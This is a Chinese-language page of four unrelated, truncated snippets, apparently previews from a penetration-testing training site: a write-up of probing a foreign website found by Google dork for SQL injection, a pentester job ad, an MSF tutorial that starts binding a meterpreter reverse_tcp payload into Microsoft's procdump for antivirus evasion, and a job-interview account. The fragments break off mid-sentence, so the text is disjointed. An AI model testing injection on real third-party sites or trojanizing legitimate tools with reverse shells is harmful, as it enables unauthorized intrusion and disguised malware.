0x00:寻找漏洞点某天闲着无聊用谷歌语法inurl:aspx?id= 找到一个国外的某个站点。功能点比较简单只有一个User ID0x01:检测功能点由于只有搜索框我们先来一个单引号看他是否报错报。 我们发现报错了单引号，我们再来一个单引号测试一下看看能不能回显,页面正常。我们发现随便输入点内容网站回显正常提示xxxx。说明有可能存在sql注入，我们继续往下看。0x02:信息收集这里利用

岗位名称：驻场渗透测试工程师工作地点：北京薪资待遇：8-12k学历要求：本科福利待遇：1．提供住宿2．六险一金（养老、医疗、工伤、失业、生育、商业保险、住房公积金）；3．享受国家法定节假日；4．享受各种有薪假：年假、年资假、婚假、产假等；5．享有每年调薪晋升机会；6．公司重视人才培养与学习，为员工提供各种内外部培训；7．舒适的办公环境，领导nice，团结和睦，互相帮助、开放舒适（扁平化管理）岗

目录0x01 利用MSF生成编码捆绑0x02:检验效果0x03:利用MSF获得shell0x01 利用MSF生成编码捆绑下面我用MSF简单的过一下免杀加上捆绑软件测试编码并绑定微软官方工具，这里使用官方的procdump做实验在Kali命令行下输入:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7

所面试的公司：联创网安 周末双休不加班薪资待遇： 6K 通过所在城市： 昆明面试职位：渗透测试工程师面试过程：boss直聘按老师课程指导，认真制作简历，当天接到公司电话，进行初步面试，并预约下午技术视频面试。当天下午去到他们公司面谈薪资问题！还有其他技术问题！1. 问题1. 面试官问题：做一下自我简绍我：我今年19岁中专毕业，去年毕业的，我18年9月份没有读书然后工作搬砖，然后开始18年接触网络